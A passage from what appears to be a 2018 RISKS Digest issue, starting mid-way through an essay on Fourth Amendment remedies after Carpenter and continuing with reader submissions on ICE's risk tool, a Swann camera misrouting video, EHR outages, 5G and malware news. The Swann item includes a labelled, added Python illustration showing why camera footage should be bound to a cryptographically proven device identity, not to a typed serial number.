    Once again, general Fourth Amendment law makes this possible in theory
    but unlikely in practice. To get evidence acquired by a warrant
    tossed out of court, a defendant must show that an investigator acted
    with ``reckless disregard'' in preparing a warrant application. In most
    states and in federal court, there is no rule that permits the
    defendant to examine police or prosecutor records. Hence, the
    defendant often must make this recklessness showing without any
    documentary evidence of what the police did.

    It is therefore usually practically impossible for most defendants to
    challenge flawed search warrants. Again, warrants for electronic data
    are no different.

    Even if a defendant succeeds in getting a warrant quashed, moreover,
    the Supreme Court has said that a reviewing court of appeals must look
    again at the warrant -- now placing a thumb on the scales in favor of
    the investigating officer. In effect, when the government loses the
    rare case in which a defendant can show a warrant to be flawed, it
    gets a second chance to have the warrant restored by a court of
    appeals.

    Prosecutors can use illicitly obtained information if a suspect
    testifies

    Still, lean your imagination into the wind to imagine a defendant who
    has overcome all these constraints, and had a warrant quashed. The
    evidence from that flawed warrant can still be introduced at trial if
    the defendant chooses to testify. The Supreme Court established that
    rule in the 1971 case of Harris v. New York, on the grounds that if
    the defendant could give testimony, the government had the concomitant
    right to undermine it by whatever information was in its hands.

    As a result, even when the government has illegally acquired evidence,
    its possession of that evidence creates a strong incentive for
    defendants not to take the stand. Needless to say, this will often
    make the prosecutor's job easier.

    If a defendant chooses not to testify, that is still not the end of
    the story. The government can also argue that information gathered
    unlawfully without a warrant should be admitted because there was an
    emergency. Chief Justice Roberts explicitly carved out an emergency
    exception in his Carpenter opinion, citing the possibility of ``bomb
    threats, active shootings, and child abductions.'' In such cases, no
    warrant is required.

    Also, if the locational data was acquired without a warrant before
    Carpenter was decided, the Court held that it need not be kept out.
    Carpenter hence helps no one whose cell-site locational data was
    acquired before this week. And the Carpenter opinion also leaves open
    the possibility that police can acquire less than seven days of
    cell-site data without a warrant.

    Are there other paths for redress? Someone in Carpenter's shoes,
    whose Fourth Amendment rights have been violated, can technically sue
    the police for damages even if they are not charged with a criminal
    offense. The problem is that the Court has almost completely
    squelched the availability of damages for most constitutional wrongs,
    including the Fourth Amendment, through a series of technical
    anti-plaintiff rules.

    In short, the legal framework of Fourth Amendment remedies has been
    riddled with so many exceptions and loopholes that Carpenter's holding
    that a warrant is required to acquire cell-site locational data is
    likely to impose no great burden on the police.

    If police can't get the information through cellphone companies, they
    will turn up the heat on suspects

    But the facts around the electronic data in Carpenter make the Court's
    holding especially hollow. Locational data is held not only by the
    telephone company. It is also contained on a person's phone, even if
    she chooses to disable locational tracking. (Certain apps can track
    locational data produced by a phone's internal sensors without the
    owner's knowledge or permission.) This data is generally accurate to
    a foot or so.

    Police can thus acquire location data -- and much more -- if they ask
    for consent to examine a phone. Extensive psychological research
    shows that most of the time -- especially if the suspect is a woman or
    a racial minority -- suspects are likely to say yes.

    General Fourth Amendment law says police can seek consent to make a
    search. In the physical search context, the Court has consistently
    ignored the fact that people often feel they have no choice but to
    acquiesce.

    Consider the leading Supreme Court case on consent searches, United
    States v. Drayton. Two men are traveling by bus in Florida, when
    police board the bus and question passengers about their trip. The
    first man is asked to ``consent'' to a pat down. He does -- and the
    officer finds blocks of cocaine taped to his groin. After this first
    man is led away in handcuffs, the officer turns to his traveling
    companion and says, ``Mind if I check you?'' The second man agrees.
    Drugs are found in exactly the same spot on his body. The Supreme
    Court holds that he consented to the search.

    My students, encountering Drayton for the first time, often have a
    moment of cognitive dissonance. Why, they wonder, did the suspect
    consent after he saw what happened to his friend? When I point out
    that both men were racial minorities in a jurisdiction with a history
    of police violence, and that neither was highly educated nor socially
    privileged, then the facts start to make more sense.

    Ironically, the Carpenter decision makes it more likely that police
    will aggressively exploit the weaknesses of the Court's consent
    case-law. By making it slightly more hassle to obtain cell-site
    locational data from a telephone company, the Court has encouraged
    police to exploit the frailty of its consent doctrine. That is, by
    making it harder to acquire electronic data from a third party, the
    Court has nudged police toward more forceful and unpleasant
    confrontations with citizens by which ``consent'' can be secured.

    This should not count as a ``success'' for Fourth Amendment freedoms.

    Electronic privacy rests on the rules and remedies that apply to the
    Fourth Amendment generally. In the past 40 years, those rules and
    remedies have been substantially eroded by a Court unwilling to
    constrain police.

    The result today is that even when a decision endorses Fourth
    Amendment protection -- and requires a warrant, as in Carpenter --
    that protection is easy to avoid, and likely ineffectual in practice.

    Aziz Huq is the Frank and Bernice J. Greenberg professor of law at the
    University of Chicago Law School.

    ------------------------------

    Date: June 27, 2018 at 08:09:05 GMT+9
    From: Richard Forno <rfo...@infowarrior.org>
    Subject: ICE hacked its algorithmic risk-assessment tool, so it recommended
    detention for everyone (BoingBoing)

    ICE hacked its algorithmic risk-assessment tool so it recommended detention for everyone

    One of the more fascinating and horrible details in Reuters' thoroughly
    fascinating and horrible long-form report on Trump's cruel border policies
    is this nugget: ICE hacked the risk-assessment tool it used to decide whom
    to imprison so that it recommended that everyone should be detained.

    This gave ICE a kind of empirical facewash for its racist and inhumane
    policies: they could claim that the computer forced them to imprison people
    by identifying them as high-risk. The policy let ICE triple its detention
    rate, imprisoning 43,000 people.

    ------------------------------

    Date: Sat, 30 Jun 2018 08:01:30 +0930
    From: Donald Mackie <don...@iconz.co.nz>
    Subject: Energy company vulnerability allows access to customer accounts

    According to this story a customer alerted the company in November 2017.
    What is interesting is the pace and incompleteness of response, lack of
    information to customers and time for a complete fix.

    Apart from the (sadly) routine nature of the vulnerability story here, one
    of the risks I see is that of testing inherited legacy systems in company
    handovers/changes. A governance and due diligence question.

    Z Energy security breach admitted as CEO fronts and apologises

    Cue A-Z of system security joke.

    ------------------------------

    Date: Wed, 27 Jun 2018 19:18:41 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Internet TV firmware update/soft powerswitch failure

    While on vacation the home we rented was equipped with all manner of
    Internet of mistakes devices, including an Internet-connected television.

    At 0200 one morning, it switched on suddenly. Apparently, the owners --
    out of convenience or pure ignorance -- elected for firmware auto-updates.

    The family was startled, as the volume had been boosted by the flash
    memory save and reboot; the legacy off-state was not restored. The
    line-of-sight TV controls remained operative.

    Although the specific TV possesses features that can auto-detect user
    inactivity after a fixed duration, or if there's an extended loss of
    input signal, I cannot help imagining if the upgrade had bricked these
    soft switches, or it possessed a ``thermal runaway'' virus maliciously
    designed to ignite the unit.

    ------------------------------

    Date: Wed, 27 Jun 2018 12:17:44 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Widespread Google Home outage: What NOT to do!

    via NNSquad

    There is apparently a widespread -- possibly global -- Google Home
    outage. However, not all units are affected. Some of my units here are
    down, at least one is up. The down units act as if they were factory
    reset and tell you to download the Home app. My recommendation is to
    NOT do so! DON'T CHANGE ANYTHING! Give Google time to deal with this
    from the server side.

    ------------------------------

    Date: Wed, 4 Jul 2018 09:13:06 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Cruel pranksters made NYC Internet kiosks play ice-cream truck tunes
    (Engadget)

    Cruel pranksters made NYC internet kiosks play ice cream truck tunes

    ------------------------------

    Date: Wed, 27 Jun 2018 19:09:58 +0000
    From: Michael Marking <mar...@tatanka.com>
    Subject: Swann home security camera sends video to wrong user (BBC)

    Home security cam sent video to wrong user

    A leading security camera-maker has sent footage from inside a
    family's home to the wrong person's app.

    Swann Security has blamed a factory error for the data breach --
    which was brought to its attention by the BBC -- and said it was a
    ``one-off'' incident. However, last month another customer reported a
    similar problem saying his version of the same app had received
    footage from a pub's CCTV system. Swann said it was attempting to
    recover the kit involved in this second case. [...]

    The BBC first learned of the problem on Saturday, when a member of
    its staff began receiving motion-triggered video clips from an
    unknown family's kitchen. Until that point, Louisa Lewis had only
    received footage from her own Swann security camera, which she had
    been using since December. The development coincided with Ms
    Lewis's camera running out of battery power and requiring a
    recharge. [...]

    A Swann customer representative told Ms Lewis that nothing could be
    done until after the weekend. And it was only after the matter was
    flagged to the firm's PR agency on Monday that she stopped receiving
    video clips. [...]

    Even if this were a factory error, the system shouldn't have failed
    absent multiple errors: the design of the manufacturing process, even
    given active quality control, should not have been dependent on a
    single point of failure. Most important, this failure mode should not
    have been possible (ok, the likelihood shouldn't have been anything
    but vanishingly small).

    Moreover, this seems to have happened more than once.

    Designers of these systems should, at least as an exercise, treat
    manufacturers, distributors, retailers, and even users as potentially
    hostile entities. This is especially true since firms are highly
    unlikely to have ownership and control of the entire chain of
    operations. For example, the credentials for one unit might
    accidentally be swapped by a retailer for those of another. Gross
    negligence is a form of hostility, and it is grossly negligent to
    assume the absence of human error.
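
    The design point above, as an added example that is not code from the
    original post, from the BBC article, or from Swann: a cloud service that
    routes footage on the serial a customer typed from the box label, beside
    one that routes only on an identity the camera itself proves with a
    per-device key provisioned at the factory. The device ids, the HMAC-based
    pairing step, the "sticker swap" at the retailer and the sample clip are
    all assumptions constructed for the illustration.

```python
"""Bind footage to the camera that proves its identity, not to a label a
human typed in.  Added illustration, not Swann's design: device ids,
secrets, the HMAC pairing step and the sticker-swap scenario are invented."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Optional


def _mac(key: bytes, context: bytes, payload: bytes) -> str:
    # Domain-separated HMAC: a pairing response cannot be replayed as an
    # upload authenticator, or the other way round.
    return hmac.new(key, context + b"\x00" + payload, hashlib.sha256).hexdigest()


@dataclass(frozen=True)
class Camera:
    """A camera as it leaves the factory: an identity and a per-device secret
    burned into firmware.  The sticker on the box is not part of this object."""
    device_id: str
    secret: bytes

    def answer_pairing(self, challenge: bytes) -> dict:
        # Answered over the local network to the owner's phone during setup.
        return {"device_id": self.device_id,
                "response": _mac(self.secret, b"pair", challenge)}

    def upload(self, clip: bytes) -> dict:
        digest = hashlib.sha256(clip).digest()
        return {"device_id": self.device_id, "clip": clip,
                "mac": _mac(self.secret, b"upload", self.device_id.encode() + digest)}


class NaiveCloud:
    """Routes a clip to whoever registered the serial printed on the box."""
    def __init__(self) -> None:
        self.owner: Dict[str, str] = {}

    def register(self, user: str, typed_serial: str) -> None:
        self.owner[typed_serial] = user           # trusts the label, not the device

    def route(self, upload: dict) -> Optional[str]:
        return self.owner.get(upload["device_id"])


class HardenedCloud:
    """Routes only on a device identity the camera has proven with its key."""
    def __init__(self, provisioned: Dict[str, bytes]) -> None:
        self.keys = provisioned                   # device_id -> secret, from the factory
        self.owner: Dict[str, str] = {}

    @staticmethod
    def pairing_challenge() -> bytes:
        return secrets.token_bytes(16)            # single-use nonce in a real service

    def _verify(self, device_id: str, context: bytes, payload: bytes, tag: str) -> bool:
        key = self.keys.get(device_id)
        return key is not None and hmac.compare_digest(_mac(key, context, payload), tag)

    def register(self, user: str, challenge: bytes, answer: dict) -> bool:
        dev = answer["device_id"]
        if not self._verify(dev, b"pair", challenge, answer["response"]):
            return False                          # unknown device or forged response
        if self.owner.get(dev, user) != user:
            return False                          # already owned: no silent takeover
        self.owner[dev] = user
        return True

    def route(self, upload: dict) -> Optional[str]:
        dev = upload["device_id"]
        digest = hashlib.sha256(upload["clip"]).digest()
        if not self._verify(dev, b"upload", dev.encode() + digest, upload["mac"]):
            return None                           # drop: cannot prove which camera sent it
        return self.owner.get(dev)


def sticker_swap_demo() -> dict:
    """Constructed scenario: a retailer swaps the box labels of two cameras."""
    cam_a = Camera("CAM-A", secrets.token_bytes(32))
    cam_b = Camera("CAM-B", secrets.token_bytes(32))
    alice_has, alice_label = cam_b, "CAM-A"       # box says CAM-A, contains cam_b
    bob_has, bob_label = cam_a, "CAM-B"           # box says CAM-B, contains cam_a
    clip = b"constructed motion clip from Alice's kitchen"

    naive = NaiveCloud()
    naive.register("alice", alice_label)
    naive.register("bob", bob_label)

    hard = HardenedCloud({c.device_id: c.secret for c in (cam_a, cam_b)})
    ch = hard.pairing_challenge()
    paired_alice = hard.register("alice", ch, alice_has.answer_pairing(ch))
    ch = hard.pairing_challenge()
    paired_bob = hard.register("bob", ch, bob_has.answer_pairing(ch))
    ch = hard.pairing_challenge()
    takeover = hard.register("mallory", ch, bob_has.answer_pairing(ch))

    upload = alice_has.upload(clip)
    tampered = dict(upload, clip=b"replaced in transit")
    return {
        "naive_routes_to": naive.route(upload),     # "bob": Alice's kitchen goes to Bob
        "hardened_routes_to": hard.route(upload),   # "alice"
        "pairing_ok": paired_alice and paired_bob,
        "takeover_refused": not takeover,
        "tampered_dropped": hard.route(tampered) is None,
    }


if __name__ == "__main__":
    print(sticker_swap_demo())
```

    Answering the challenge on the local network is what stands in for proof
    of ownership here, as it does in most consumer Wi-Fi onboarding; anyone
    on that LAN during setup could pair, so the challenge must be single-use
    and the pairing window short. The narrower point the scenario makes is
    that once an account is bound to the key the camera actually holds, a
    mislabelled box, a retailer's inventory mix-up or a replacement unit
    shipped under the wrong serial cannot deliver one household's footage to
    another, and a clip whose authenticator does not verify is dropped rather
    than routed on a guess.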

    ------------------------------

    Date: Thu, 28 Jun 2018 12:08:17 +0200
    From: Peter Houppermans <pe...@houppermans.net>
    Subject: Hidden Microsoft Office 365 data gathering (LMG Security)

    I came across this interesting post:

    http://lmgsecurity.com/exposing-the-secret-office-365-forensics-tool/

    Extract: ``An ethical crisis in the digital forensics industry came to a
    head last week with the release of new details on Microsoft's undocumented
    `Activities' API. A previously unknown trove of access and activity logs
    held by Microsoft allows investigators to track Office 365 mailbox activity
    in minute detail. Following a long period of mystery and rumors about the
    existence of such a tool, the details finally emerged, thanks to a video by
    Anonymous and follow-up research by CrowdStrike.

    Now, investigators have access to a stockpile of granular activity data
    going back six months -- even if audit logging was not enabled. For victims
    of Business Email Compromise (BEC), this is huge news, because investigators
    are now far more likely to be able to `rule out' unauthorized access to
    specific emails and attachments.''

    Maybe I'm just picky, but I like to know what software is logging what
    activity, due to compliance and confidentiality needs. The two are
    frequently in conflict, so precision is essential.

    From a privacy perspective, it appears it's time to revert to parchment,
    quill and ink.

    ------------------------------

    Date: Tue, 3 Jul 2018 18:24:27 -0700
    From: Rob Slade <rms...@shaw.ca>
    Subject: Protecting civilians in cyberspace (Just Security)

    Over the years, we've explored (and often shied away from) the idea of
    infosec pros as a kind of military or police force, protecting the general
    public from the digital/cybersecurity bad guys.

    So I find this article on protecting civilians in cyberspace, seemingly by
    people outside the traditional infosec community, quite interesting. The
    emphasis seems to be on human rights, rather than general computer use, but
    there are some intriguing ideas just the same.

    http://www.justsecurity.org/58838/protecting-civilians-cyberspace-ideas-road/

    [Interesting name. It is Never *Just* Security, as (1) it is often
    something else as well, and (2) Security is never Just. PGN]

    ------------------------------

    Date: Tue, 3 Jul 2018 20:27:56 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Rash of Fortnite cheaters infected by malware that breaks HTTPS
    encryption (Ars Technica)

    Malware can read, intercept, or tamper with the traffic of any
    HTTPS-protected site.

    http://arstechnica.com/information-...cted-by-malware-that-breaks-https-encryption/

    ------------------------------

    Date: Tue, 3 Jul 2018 20:26:39 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Really dumb malware targets cryptocurrency fans using Macs
    (Ars Technica)

    A command spread through Slack and Discord channels to cryptocurrency users
    is a trap.

    http://arstechnica.com/information-...lware-targets-cryptocurrency-fans-using-macs/

    ------------------------------

    Date: Tue, 3 Jul 2018 17:43:12 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Sony Blunders By Uploading Full Movie to YouTube Instead of Trailer
    (TorrentFreak)

    Sony Pictures Entertainment's movie `Khali the Killer' is on release in the
    United States and, as is customary, a trailer has been uploaded to YouTube.
    However, on closer inspection, it appears that Sony uploaded the entire
    movie in error. Oops.

    http://torrentfreak.com/sony-blunders-uploading-full-movie-youtube-instead-trailer-180703/
    The price is right...

    [Monty Solomon noted this item:
    http://arstechnica.com/gaming/2018/...railer-to-youtube-posts-entire-movie-instead/
    PGN]

    ------------------------------

    Date: Mon, 2 Jul 2018 15:04:13 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Homeland Security subpoenas Twitter for data breach finder's account
    (Zack Whittaker)

    Zack Whittaker for Zero Day | 2 Jul 2018
    http://www.zdnet.com/article/homeland-security-subpoenas-twitter-for-data-breach-finders-account/

    Homeland Security has served Twitter with a subpoena, demanding the account
    information of a data breach finder, credited with finding several large
    caches of exposed and leaking data.

    The New Zealand national, whose name isn't known but goes by the handle
    Flash Gordon, revealed the subpoena in a tweet last month.

    Also: Homeland Security's own IT security is a hot mess, watchdog finds

    The pseudonymous data breach finder regularly tweets about leaked data found
    on exposed and unprotected servers. Last year, he found a trove of almost a
    million patients' data leaking from a medical telemarketing firm. A recent
    find included an exposed cache of law enforcement data by ALERRT, a Texas
    State University-based organization, which trains police and civilians
    against active shooters. The database, secured in March but reported last
    week, revealed that several police departments were under-resourced and
    unable to respond to active shooter situations.

    Homeland Security's export control agency, Immigration and Customs
    Enforcement (ICE), served the subpoena to Twitter on April 24, demanding
    information about the data breach finder's account.

    [Also noted by Gene Wirchenko. PGN]

    ------------------------------

    Date: Tue, 3 Jul 2018 08:39:56 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Wikipedia Italy Blocks All Articles in Protest of EU's Ruinous
    Copyright Proposals (Gizmodo)

    NNSquad
    http://gizmodo.com/wikipedia-italy-blocks-all-articles-in-protest-of-eus-r-1827312550

    On Tuesday, Wikipedia Italy set all of its pages to redirect to a
    statement raising awareness for the upcoming vote that (barring some
    legislative wrangling) would make the copyright directive law. The
    statement reads, in part (emphasis theirs): On July 5, 2018, The Plenary
    of the European Parliament will vote whether to proceed with a copyright
    directive proposal which, if approved, will significantly harm the
    openness of the Internet. The directive instead of updating the copyright
    laws in Europe and promoting the participation of all the citizens to the
    society of information, threatens online freedom and creates obstacles to
    accessing the Web, imposing new barriers, filters and restrictions. If the
    proposal would be approved in its current form, it could be impossible to
    share a news article on social networks, or find it through a search
    engine; Wikipedia itself would be at risk.

    Just a taste of what's coming to European Internet users if those laws
    are enacted.

    ------------------------------

    Date: Mon, 2 Jul 2018 23:45:55 -0400
    From: ``Fr. Stevan Bauman'' <father...@indy.net>
    Subject: How a Major Computer Crash Showed the Vulnerabilities of EHRs
    (Medscape)

    Marcia Frellick, Medscape, 14 Jun 2018
    http://www.medscape.com/viewarticle...PEDIT_hospmed&uac=64984BJ&impID=1667063&faf=1

    The recent communications outage at Sutter Health, the largest health system
    in northern California, which cut off access to electronic health records
    (EHRs), highlighted the frequency of such outages and the need for backup
    plans and drills nationwide. [...]

    Andrew Gettinger, MD, chief clinical officer for the Office of the National
    Coordinator for Health Information Technology, part of the US Department of
    Health and Human Services, said all systems need backup plans and pointed to
    the recommendation from the Joint Commission for annual disaster drills.

    ``It's not a question of IS your system going to be unavailable, because I
    think almost every computer system in every context is at some time or
    another not available,'' he told /Medscape Medical News/. ``The question is
    then -- what's the institutional contingency plan?''

    Gettinger said that downtime for computer systems is not unlike other
    disasters health systems plan for regularly. ``It's no different from what
    happens when the power in the building goes out or the water supply goes out
    or you're no longer able to get compressed oxygen or nitrous oxide. I don't
    think patients or doctors really need to be worried about it unnecessarily.''

    All health systems should know about the SAFER guides
    <https://www.healthit.gov/topic/safety/safer-guides>
    (Safety Assurance Factors for EHR Resilience), put in place to address EHR
    safety nationally, Gettinger said. The guides were updated last year.

    Dean Sittig, PhD, a professor at the University of Texas Health's School of
    Biomedical Informatics, helped write those guidelines and also was lead
    author on a study in 2014 <https://www.ncbi.nlm.nih.gov/pubmed/25200197>
    that surveyed US-based healthcare institutions that were part of a
    professional collaborative on their exposure to downtime.

    In that study, researchers found that nearly all (96%) of the 50 large,
    integrated institutions who responded had at least one unplanned downtime in
    the past 3 years and 70% had at least one unplanned downtime greater than 8
    hours in the past 3 years. [...]

    In another paper
    http://www.nejm.org/doi/full/10.1056/NEJMsb1205420
    Sittig wrote that, in April 2010, one third of the hospitals in Rhode Island
    had to delay elective surgeries and divert some patients when an automatic
    antivirus update crashed the system.

    ``You depend on the computer for everything -- registration, scheduling, past
    visit notes, results of laboratory tests. The healthcare system is now
    dependent on the electronic health record to care for patients,'' Sittig told
    /Medscape Medical News/.

    In the Sutter case, a fire-suppression system was activated. Sittig
    explained that the suppression systems in data centers typically involve an
    alarm going off to alert people to get out of the room, then doors lock and
    all the oxygen is sucked out of the room and replaced with fire-retardant
    gas.

    Because the gas has to be flushed out, then the oxygen levels restored, then
    the computers restarted, ``you're talking probably a minimum of 4-6 hours,''
    Sittig says. ``That's when everything works perfectly.'' He said systems
    should expect accidents to happen and that they will be costly. ``A big
    hospital probably loses at least $1 million per hour when they're down,''
    Sittig said.

    But investments in data protection can be a hard sell. A chief financial
    officer, Sittig said, may say a $3 million backup data center is too
    expensive, for example.

    ``You have to ask them, 'Can you afford to be down 5 hours? That will cost us
    $5 million. So we should spend the $3 million as an insurance policy,' ''
    Sittig said.

    Adding to the problem, he said, is that in the modern healthcare system,
    with an institution that's been using an EHR 5 or more years, many young
    providers have never worked in a place that has a paper system and aren't
    familiar with those operations.

    Sittig added that paper systems are subject to their own dangers -- fire,
    water, and wind, for example.

    But electronic records that make it easy to spread information instantly
    across hospitals, sometimes in many states, also can mean instant, massive
    failures.

    The first thing hospital systems do when a disaster strikes, Sittig says, is
    decide what can be cut, and the first thing to go is usually the elective
    surgeries. Then ambulances may be instructed to take patients elsewhere.
    ``Then you try to discharge the people who aren't very sick. Then they start
    sending people home early. We've created a system where we're relying on an
    electromechanical device that we know is going to break. There's no question
    computers are going to break.''

    ------------------------------

    Date: Sat, 30 Jun 2018 23:13:48 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Apple 'Family Sharing' feature used by scammers to make purchases
    with hacked Apple IDs (Business Insider)

    People are discovering that scammers are controlling their Apple accounts
    using a feature for families to share apps

    When David tried to download apps on his iPhone and iPad recently, he found
    he wasn't able to because his account was linked to something called *Family
    Sharing*.

    That's a feature that Apple introduced in 2014 to make it easier to share
    apps, iCloud storage, and iTunes content like music and movies with up to
    five family members.

    But this was news to David, who says he didn't remember turning on Family
    Sharing. After he dug into his account settings, he received a popup that to
    remove himself from the Family Sharing account he needed to contact a name
    that was in Chinese -- and he had no way to get in touch.

    http://www.businessinsider.com/appl...mers-to-make-purchases-hacked-accounts-2018-6

    ------------------------------

    Date: Tue, 03 Jul 2018 18:50:25 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: ``Trump administration tells FCC to block China Mobile from U.S.''
    (Corinne Reichert)

    Corinne Reichert, ZDNet, 3 Jul 2018
    Mobile access to U.S. telecommunications networks would carry a `substantial
    and unacceptable risk' to national security and law enforcement, the U.S.
    government has said.
    http://www.zdnet.com/article/trump-administration-tells-fcc-to-block-china-mobile-from-us/

    selected text:

    The Federal Communications Commission (FCC) has been advised by the
    Executive Branch to deny China Mobile entry to the United States
    telecommunications industry, citing ``substantial and unacceptable risk to US
    law enforcement and foreign intelligence collection''.

    The Executive Branch, which includes the Departments of Justice, Homeland
    Security, Defense, State, and Commerce, along with the Offices of Science
    and Technology Policy and the US Trade Representative, made the
    recommendation almost seven years after China Mobile International (USA)
    made the application for a certificate under s214 of the Communications Act.

    A 2013 letter [PDF] from counsel for China Mobile USA had noted the ``extreme
    delay'' in granting the licence -- which was originally applied for in
    September 2011 -- saying the delay ``is causing significant and unwarranted
    harm to China Mobile USA's business operations''.

    Huawei Australian chair John Lord last week said the Chinese technology
    giant is the most audited, inspected, reviewed, and critiqued IT company in
    the world, and has never had a national security issue.

    ``After every kind of inspection, audit, review, nothing sinister has
    been found. No wrongdoing, no criminal action or intent, no 'back
    door', no planted vulnerability, and no 'magical kill switch'. In
    fact, in our three decades as a company no evidence of any sort has
    been provided to justify these concerns by anyone -- ever.''

    ------------------------------

    Date: Sat, 30 Jun 2018 13:41:59 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Google is training machines to predict when a patient will die
    (Los Angeles Times)

    http://www.latimes.com/business/tec...l-intelligence-healthcare-20180618-story.html

    ``What impressed medical experts most was Google's ability to sift through
    data previously out of reach: notes buried in PDFs or scribbled on old
    charts. The neural net gobbled up all this unruly information then spat
    out predictions. And it did so far faster and more accurately than
    existing techniques. Google's system even showed which records led it to
    conclusions.

    ``Dean envisions the AI system steering doctors toward certain medications
    and diagnoses. Another Google researcher said existing models miss obvious
    medical events, including whether a patient had prior surgery. The person
    described existing hand-coded models as `an obvious, gigantic roadblock'
    in healthcare. The person asked not to be identified discussing work in
    progress.

    ``For all the optimism over Google's potential, harnessing AI to improve
    healthcare outcomes remains a huge challenge. Other companies, notably
    IBM's Watson unit, have tried to apply AI to medicine but have had limited
    success saving money and integrating the technology into reimbursement
    systems.''

    The perfect *death panel* proxy, and no longer a burden to physicians,
    bioethicists, insurance agents, hospital administrators, and patient
    advocates, Google's Medical Brain AI platform calculates a human life's
    merit score.

    Can this platform factor patient quality of life outcome potential into the
    learning algorithm's neural network processing decisions? What weight would
    this factor possess relative to the others? Under what medical conditions is
    this platform relevant to even consult? What happens if a test result
    applied as an input, such as for blood chemistry, is skewed by a
    contaminated reagent?

    Until proven to improve health care outcomes, if ever, a ``blackbox
    warning label'' seems like a wise precaution.
    http://en.wikipedia.org/wiki/Boxed_warning

    Will Google's Medical Brain employees and immediate family members be
    required to participate in a randomized controlled trial using the Medical
    Brain AI platform?

    ------------------------------

    Date: July 4, 2018 at 10:18:15 AM GMT+9
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: So What The Heck Does 5G Actually Do? And Is It Worth What The Carriers
    Are Demanding? (Harold Feld)

    Harold Feld, WetMachine, 28 Jun 2018

    http://www.wetmachine.com/tales-of-...-is-it-worth-what-the-carriers-are-demanding/

    It's become increasingly impossible to talk about spectrum policy without
    getting into the fight over whether 5G is a miracle technology that will end
    poverty, war and disease or an evil marketing scam by wireless carriers to
    extort concessions in exchange for magic beans. Mind you, most people never
    talk about spectrum policy at all -- so they are spared this problem in the
    first place. But with T-Mobile and Sprint now invoking 5G as a central
    reason to let them merge, it's important for people to understand precisely
    what 5G actually does. Unfortunately, when you ask most people in Policyland
    what 5G actually does and how it works, the discussion looks a lot like the
    discussion in Hitchhikers Guide To the Galaxy where Deep Thought announces
    that the answer to Life the Universe and Everything is `42'.

    So while not an engineer, I have spent the last two weeks or so doing a deep
    dive on what, exactly does 5G actually do -- with a particular emphasis on
    the recently released 3GPP standard (Release 15) that everyone is
    celebrating as the first real industry standard for 5G. My conclusion is
    that while the Emperor is not naked, that is one Hell of a skimpy thong he's
    got on.

    More precisely, the bunch of different things that people talk about when
    they say `5G': millimeter wave spectrum, network slicing, and something
    called (I am not making this up) `flexible numerology' are real. They
    represent improvements in existing wireless technology that will enhance
    overall efficiency and thus add capacity to the network (and also reduce
    latency). But, as a number of the more serious commentators (such as Dave
    Burstein over here) have pointed out, we can already do these things using
    existing LTE (plain old 4G). Given the timetable for development and
    deployment of new 5G network technology, it will be at least 5 years before
    we see more than incremental improvement in function and performance.

    Put another way, it would be like calling the adoption of a new version of
    Wi-Fi `5G Wi-Fi.' (Which I am totally going to do from now on, btw, because
    why not?)

    I elaborate more below . . .

    There are a bunch of important questions to keep in mind when evaluating
    what we ought to do about 5G as a policy question. (a) What exactly is 5G?
    (b) How does it compare to existing LTE? and, (c) How much are we being
    asked to pay for it in policy terms?

    What Exactly Do We Mean By `G'

    `G' technically means `generation'. My favorite explanation can be found in
    this old Best Buy commercial. As a general rule, we use `G' to indicate a
    significant shift in capability, architecture and technology. For example,
    the shift from analog to digital voice in 2G, or the inclusion of limited
    data capability as an overlay to voice in 3G. The shift to 4G was marked by
    a shift to an all packet-switched data network in which voice is supported
    as one feature on the network. In addition, 4G turned out to be fairly
    homogeneous for a variety of reasons I won't get into now. Basically, after
    a brief flirtation by Sprint and a few others with WiMax, all the carriers
    ended up using LTE.

    So the switch to 5G ought to mean a major boost in both technology and
    speed. And it will, eventually. But for now, it's not so much a generational
    shift like the previous shifts but a modest transition over time. By that I
    don't mean simply that we will see 5G networks operating with 4G cores for a
    long time. That's always true. Carriers deployed LTE and still maintained
    (some to this day) 3G networks in parallel. That is necessary so that people
    and businesses can switch legacy equipment at a rational pace. What I mean
    is that the capabilities that are supposed to make 5G so awesome are not
    really that awesome right now, and won't be for at least 5 more years.

    What Makes 5G More Awesome?

    Here is where it gets confusing. You can see a good tutorial on the network
    architecture here. But this represents a relatively recent change in how we
    talk about 5G. Originally, i.e., back in 2015, we were talking about
    millimeter wave as 5G, with nothing else going on in the lower frequencies
    counting as 5G. [...]

    ------------------------------

    Date: Tue, 3 Jul 2018 20:29:22 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Leaks, riots, and monocles: How a $60 in-game item almost destroyed
    EVE Online (Ars Technica)

    When the developers of EVE Online added expensive in-game vanity items... it
    went poorly.

    http://arstechnica.com/gaming/2018/07/monocles/

    ------------------------------

    Date: Mon, 02 Jul 2018 11:54:05 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Gaming disorder is only a symptom of a much larger problem (WaPo)

    [Suitably revised, this submission might make a good April Fool's comp.risks
    contribution in 2019. And jolt a few CxOs from their Caesar salad lunch. od
    -c output attached below for peace of mind.]

    http://www.washingtonpost.com/opinions/gaming-disorder-is-only-a-symptom-of-a-much-larger-problem/2018/06/29/64f2866a-7a21-11e8-93cc-6d3beccdd7a3_story.html

    Mobile electronic devices generate addiction symptoms that mirror those
    caused by nicotine. The iGen -- young people raised on smart phones and
    social media -- are especially vulnerable to screen addiction disorder.

    Would an enterprising state attorney general attempt the equivalent of a
    ``Tobacco Master Settlement Agreement''
    (http://en.wikipedia.org/wiki/Tobacco_Master_Settlement_Agreement) against
    mobile device manufacturers, application developers, and social media for
    public health expenditures arising from treatment?

    From the MSA Wikipedia page:

    ``The general theory of these lawsuits was that the cigarettes produced by
    the tobacco industry contributed to health problems among the population,
    which in turn resulted in significant costs to the states' public health
    systems.''

    Recall that the Tobacco MSA amounted to settlement payments from tobacco
    firms for ~$US 200-375B over 25 years to reimburse states for expenses
    arising from tobacco-related illness and disease treatment. The MSA also
